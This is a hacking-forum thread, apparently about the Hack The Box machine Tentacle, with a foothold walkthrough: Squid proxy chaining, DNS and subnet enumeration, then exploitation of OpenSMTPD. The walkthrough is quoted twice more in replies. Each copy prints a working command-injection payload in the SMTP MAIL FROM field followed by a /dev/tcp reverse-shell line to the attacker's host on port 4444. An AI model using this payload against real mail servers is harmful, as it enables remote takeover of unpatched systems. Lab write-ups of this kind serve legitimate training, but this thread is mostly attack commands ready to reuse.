TUTORIAL Tentacle Foothold tutorial
by lingling40hrs - January 29, 2021 at 05:28 PM
#1
Nmap scan revealed 3128 port. Which is squid proxy. Also opening the 10.10.10.224:3128 gave us two piece of informations. an username [email protected] and a subdomain srv01.realcorp.htb.
Running AS-REP roasting for that username gave us a hash which is a **RABBIT HOLE**:
GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat
Now running DNS enum we can get 3 hosts:
dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
Result:
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
proxy.realcorp.htb.                      259200  IN    CNAME    ns.realcorp.htb.
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
wpad.realcorp.htb.                      259200  IN    A        10.197.243.31
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
But no internal IP is accessible. So we add the proxy in our proxychain then ran nmap on 127.0.0.1 and the result has the same port except now a new port Kpasswd5.
//etc/proxychains.conf
http 10.10.10.224 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 127.0.0.1
But from there as well we are not able to access any IP, so maybe the proxy doesnt like incoming traffic. So we add another entry in our proxychain to route the packets through 10.10.10.224:3128 -> 127.0.0.1:3128. But then suddenly the 10.197.243.77 IP became accessible.
//etc/proxychains.conf
http 10.10.10.224 3128
http 127.0.0.1 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.77
Now, here as well we have a 3128 squid port, by again adding this proxy now we got a another IP 10.197.243.31 became accessible and it opened a 80 port.
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.31

Now we are running WFUZZ for any subdomain or dirbusting. Dirbusting didnt yeild anything but Subdomain enumeration gave me wpad subdomain.
proxychains4 -q wfuzz -t64 -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.realcorp.htb" --hh 4057 http://10.197.243.31/ | tee realcorp_fuzz_lastip

"wpad.realcorp.htb"
Now wpad is a very strong clue that its a wpad subdomain so we got the wpad.dat file which is the default config file:
[130] % proxychains curl http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.197.243.31:80  ...  OK
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";

    return "PROXY proxy.realcorp.htb:3128";
}
So, we already know the 10.197.243.0 domains, we now need to check out 10.241.251.0. Which I ran namp against the entire /24 octet with top ports and saw that 10.241.251.113 has a SMTP port open and running OpenSMTPD.
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
# then
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb
Which has multiple readymade exploit. I have used the qualys payload from here: https://www.qualys.com/2020/01/28/cve-20...nsmtpd.txt which is opted by metasploit as well and is an genius of a payload. we saw that as the default RCPT TO:<root> didnt work so we changed to RCPT TO:<[email protected]> instead and viola, we have reverse shell.
Now, proxychains nc 10.241.251.113 25:
HELO x
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<[email protected]>
DATA

#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/<yourip>/4444;sh <&95 >&95 2>&95

Donate if u like Hidden Content
You must register or login to view this content.
#2
what about root part any nudge for it would be helpful?
#3
(January 30, 2021 at 04:03 AM)jenna_js Wrote: what about root part any nudge for it would be helpful?
I know root if I can get the shell to pop what exploit are you using exactly
#4
(January 29, 2021 at 05:28 PM)lingling40hrs Wrote: Nmap scan revealed 3128 port. Which is squid proxy. Also opening the 10.10.10.224:3128 gave us two piece of informations. an username [email protected] and a subdomain srv01.realcorp.htb.
Running AS-REP roasting for that username gave us a hash which is a **RABBIT HOLE**:
GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat
Now running DNS enum we can get 3 hosts:
dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
Result:
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
proxy.realcorp.htb.                      259200  IN    CNAME    ns.realcorp.htb.
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
wpad.realcorp.htb.                      259200  IN    A        10.197.243.31
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
But no internal IP is accessible. So we add the proxy in our proxychain then ran nmap on 127.0.0.1 and the result has the same port except now a new port Kpasswd5.
//etc/proxychains.conf
http 10.10.10.224 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 127.0.0.1
But from there as well we are not able to access any IP, so maybe the proxy doesnt like incoming traffic. So we add another entry in our proxychain to route the packets through 10.10.10.224:3128 -> 127.0.0.1:3128. But then suddenly the 10.197.243.77 IP became accessible.
//etc/proxychains.conf
http 10.10.10.224 3128
http 127.0.0.1 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.77
Now, here as well we have a 3128 squid port, by again adding this proxy now we got a another IP 10.197.243.31 became accessible and it opened a 80 port.
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.31

Now we are running WFUZZ for any subdomain or dirbusting. Dirbusting didnt yeild anything but Subdomain enumeration gave me wpad subdomain.
proxychains4 -q wfuzz -t64 -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.realcorp.htb" --hh 4057 http://10.197.243.31/ | tee realcorp_fuzz_lastip

"wpad.realcorp.htb"
Now wpad is a very strong clue that its a wpad subdomain so we got the wpad.dat file which is the default config file:
[130] % proxychains curl http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.197.243.31:80  ...  OK
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";

    return "PROXY proxy.realcorp.htb:3128";
}
So, we already know the 10.197.243.0 domains, we now need to check out 10.241.251.0. Which I ran namp against the entire /24 octet with top ports and saw that 10.241.251.113 has a SMTP port open and running OpenSMTPD.
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
# then
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb
Which has multiple readymade exploit. I have used the qualys payload from here: https://www.qualys.com/2020/01/28/cve-20...nsmtpd.txt which is opted by metasploit as well and is an genius of a payload. we saw that as the default RCPT TO:<root> didnt work so we changed to RCPT TO:<[email protected]> instead and viola, we have reverse shell.
Now, proxychains nc 10.241.251.113 25:
HELO x
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<[email protected]>
DATA

#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/<yourip>/4444;sh <&95 >&95 2>&95

[Hidden Content]

got rev shell as root. but can't see anything. idk why i got shell as root.
#5
(January 30, 2021 at 08:16 AM)modamanitha Wrote:
(January 29, 2021 at 05:28 PM)lingling40hrs Wrote: Nmap scan revealed 3128 port. Which is squid proxy. Also opening the 10.10.10.224:3128 gave us two piece of informations. an username [email protected] and a subdomain srv01.realcorp.htb.
Running AS-REP roasting for that username gave us a hash which is a **RABBIT HOLE**:
GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat
Now running DNS enum we can get 3 hosts:
dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb
Result:
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
proxy.realcorp.htb.                      259200  IN    CNAME    ns.realcorp.htb.
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
wpad.realcorp.htb.                      259200  IN    A        10.197.243.31
ns.realcorp.htb.                        259200  IN    A        10.197.243.77
But no internal IP is accessible. So we add the proxy in our proxychain then ran nmap on 127.0.0.1 and the result has the same port except now a new port Kpasswd5.
//etc/proxychains.conf
http 10.10.10.224 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 127.0.0.1
But from there as well we are not able to access any IP, so maybe the proxy doesnt like incoming traffic. So we add another entry in our proxychain to route the packets through 10.10.10.224:3128 -> 127.0.0.1:3128. But then suddenly the 10.197.243.77 IP became accessible.
//etc/proxychains.conf
http 10.10.10.224 3128
http 127.0.0.1 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.77
Now, here as well we have a 3128 squid port, by again adding this proxy now we got a another IP 10.197.243.31 became accessible and it opened a 80 port.
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN nmap/pivoted_77 10.197.243.31

Now we are running WFUZZ for any subdomain or dirbusting. Dirbusting didnt yeild anything but Subdomain enumeration gave me wpad subdomain.
proxychains4 -q wfuzz -t64 -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.realcorp.htb" --hh 4057 http://10.197.243.31/ | tee realcorp_fuzz_lastip

"wpad.realcorp.htb"
Now wpad is a very strong clue that its a wpad subdomain so we got the wpad.dat file which is the default config file:
[130] % proxychains curl http://wpad.realcorp.htb/wpad.dat
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  10.10.10.224:3128  ...  127.0.0.1:3128  ...  10.197.243.77:3128  ...  10.197.243.31:80  ...  OK
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";

    return "PROXY proxy.realcorp.htb:3128";
}
So, we already know the 10.197.243.0 domains, we now need to check out 10.241.251.0. Which I ran namp against the entire /24 octet with top ports and saw that 10.241.251.113 has a SMTP port open and running OpenSMTPD.
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
# then
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113

PORT  STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb
Which has multiple readymade exploit. I have used the qualys payload from here: https://www.qualys.com/2020/01/28/cve-20...nsmtpd.txt which is opted by metasploit as well and is an genius of a payload. we saw that as the default RCPT TO:<root> didnt work so we changed to RCPT TO:<[email protected]> instead and viola, we have reverse shell.
Now, proxychains nc 10.241.251.113 25:
HELO x
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<j.[email protected]>
DATA

#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/<yourip>/4444;sh <&95 >&95 2>&95

[Hidden Content]

got rev shell as root. but can't see anything. idk why i got shell as root.

Because you are root on the smtp server. Now you have to pivot

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG free no credits Breadcrumbs admin ssh + description tutorial paulwatson42016 5 2,351 March 01, 2021 at 07:12 AM
Last Post: JackThePippers
FLAG TENTACLE FREE WRITEUP RFADMIN 15 3,079 February 18, 2021 at 11:22 AM
Last Post: Buttmuncher
TUTORIAL HTB - APT - Full tutorial EddieFlagg 20 4,393 February 17, 2021 at 11:23 PM
Last Post: AncientAnarchy

 Users browsing this thread: 5 Guest(s)